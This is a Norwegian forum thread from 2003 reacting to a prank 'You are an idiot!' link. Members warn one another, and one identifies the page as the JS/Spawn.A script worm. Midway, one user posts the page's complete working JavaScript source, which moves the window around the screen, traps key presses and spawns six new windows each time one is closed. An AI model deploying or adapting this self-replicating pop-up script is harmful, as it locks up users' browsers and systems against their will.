lubb Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 For folk som holder på med noe viktigt, IKKE trykk på den linken. Hele systemet låste seg hos meg, og jeg måtte restarte pc'en. Jeg synest du burde hatt en bedre advarsel til den linken der Hvorfor postet du ikke dette på søppel forumet. Lenke til kommentar
Cursed Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Var det noe galt med den? Da jeg åpnet den i Opera, kom det bare et nytt vindu med en flash-animasjon og lyd, og det lukket jeg nesten med en gang, da jeg hørte på musikk. Skjedde ikke noe spesielt. Lenke til kommentar
vaskiZ Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Var det noe galt med den? Da jeg åpnet den i Opera, kom det bare et nytt vindu med en flash-animasjon og lyd, og det lukket jeg nesten med en gang, da jeg hørte på musikk. Skjedde ikke noe spesielt. Har du valgt at opera'n ikke skal akseptere pop-up vinduer i det hele tatt eller bare de du trykker på? Skulle tru at hvis du prøver med internet explorer så går det nok annerledes. :wink: (Med mindre du har en pop-up stopper) Skjedde ikke no hos meg heller (jeg brukte også opera). Lenke til kommentar
lubb Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Vist du bruker explorer kommer det 50 til 60 pop-up vinuer, og hopper fram og tilbake på skjermen. Lenke til kommentar
akzj0n Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Herregud for en idiot. Hva faen er vitsen med å posten den linken i det hele tatt ? Lenke til kommentar
Bluebeans Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 bare høyreklikk nede i oppgavelinja og lukk. :wink: Lenke til kommentar
rabagast3 Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Vil bare gi beskjed til de som prøvde linken. Den siden har en java script orm. Så jeg håper dere har et oppdatert virus program som dere bruker. det er et :JS/Spawn.A her er en linka angående dette java scriptet: http://www.sophos.com/virusinfo/analyses/jsspawna.html det er ikke så farlig men hvem vil ha det liggende alikevel! Lenke til kommentar
ChalStye Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 fikk bare en trojaner av den siden wench.. Lenke til kommentar
vidarv Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 syntes den var litt bra jeg faktisk Kan noen få sendt den linken til Gate'n og gjør'n oppmerksom på problemet? Lenke til kommentar
Kjetil Lura Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 syntes den var litt bra jeg faktisk Kan noen få sendt den linken til Gate'n og gjør'n oppmerksom på problemet? Eg og, lo bra da eg fikk beskjed om at eg er en idiot Lenke til kommentar
Battone Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Har nettopp formatert hdd så jeg åpnet med explorer... Skjønte fort at det var på tide å hente opera igjen... Lenke til kommentar
dostojevski Skrevet 1. mai 2003 Del Skrevet 1. mai 2003 Ihvertfall kos å se at antivirusprogrammet fungerer som det skal... Lenke til kommentar
hopless Skrevet 2. mai 2003 Del Skrevet 2. mai 2003 <html> <head> <title>You are an idiot!</title> <script language=Javascript> function bookmark() { if ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 4)) { var url="http://www.feetman.com"; var title="Idiot!"; window.external.AddFavorite(url,title); } } function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); } function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); } function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); } var xOff = 5; var yOff = 5; var xPos = 400; var yPos = -100; var flagRun = 1; function openWindow(url){ aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes'); } function procreate(){ openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); } function newXlt(){ xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; window.focus()} function newXrt(){ xOff = Math.ceil(7 * Math.random()) * 5 - 10 ; } function newYup(){ yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; } function newYdn(){ yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; } function fOff(){ flagrun = 0; } function playBall(){ xPos += xOff; yPos += yOff; if (xPos > screen.width-175){ newXlt(); } if (xPos < 0){ newXrt(); } if (yPos > screen.height-100){ newYup(); } if (yPos < 0){ newYdn(); } if (flagRun == 1){ window.moveTo(xPos,yPos); setTimeout('playBall()',1); } } </script> </head> <body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%"> <param name=movie value="youare.swf"> <param name=quality value=high> <embed src="youare.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"> </embed> </object> </body> </html> Lenke til kommentar
dimiles Skrevet 2. mai 2003 Del Skrevet 2. mai 2003 Har nettopp formatert hdd så jeg åpnet med explorer... Skjønte fort at det var på tide å hente opera igjen... dreamlord, den avataren er for stor, 50*50 er max og 6kB. pass deg før drita allyse eller hartge kommer og tar deg :wink: Lenke til kommentar
SirHartge Skrevet 2. mai 2003 Del Skrevet 2. mai 2003 Totalt unødvendig, bruker er KRAFTIG advart for denne episoden. Det er ikke gøyt å spre virus etc. Lenke til kommentar
Anbefalte innlegg